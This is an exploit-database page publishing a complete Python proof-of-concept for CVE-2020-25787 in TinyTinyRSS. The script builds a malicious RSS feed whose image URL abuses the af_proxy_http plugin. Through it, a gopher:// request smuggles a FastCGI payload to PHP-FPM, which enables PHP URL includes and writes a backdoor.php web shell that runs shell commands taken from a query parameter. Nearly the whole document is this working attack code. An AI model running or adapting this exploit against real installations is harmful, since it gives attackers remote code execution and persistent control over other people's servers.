TinyTinyRSS Remote Code Execution

2021.03.02
Risk: High
Local: No
Remote: Yes
CWE: N/A

#!/usr/bin/env python3 # Exploit Title: TinyTinyRSS remote code execution # Date: 21 September 2020 made public # Exploit Author: Daniel Neagaru & Benjamin Nadarević # Blog post: https://www.digeex.de/blog/tinytinyrss/ # Software Link: https://git.tt-rss.org/fox/tt-rss # Version: all before 2020-09-16 # Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef # Tested on: default docker installation method # CVE : CVE-2020-25787 from sys import argv import urllib.parse as ul import base64 def CustomFcgi( filename, output, backdoor): length=len(output)+len(backdoor)+64 char=chr(length) data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length))) data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n" data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/" temp1 = chr(len(data) // 256) temp2 = chr(len(data) % 256) temp3 = chr(len(data) % 8) end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00" end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00" start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00" payload = start + data + end def get_payload(payload): finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/") return finalpayload return "gopher://localhost:9000/_"+get_payload(get_payload(payload)) TTRSS_PATH = "/var/www/html/tt-rss/" BACKDOOR_CODE = """ <?php echo "success\n"; echo system($_GET['cmd']); ?> """ feed_file = open("malicious_RCE_feed.xml",'w') filename = TTRSS_PATH + "config.php" output = TTRSS_PATH + "backdoor.php" backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii")) rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text" feed ="""<?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"> <channel> <title>Exploit demo - rce</title> <link></link> <description>You are getting infected :(</description> <item> <title> Check if there is backdoor.php</title> <link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link> <description> <![CDATA[ Dummy text <img src="{}"> ]]> </description> </item> </channel> </rss> """.format(rce) feed_file.write(feed) feed_file.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top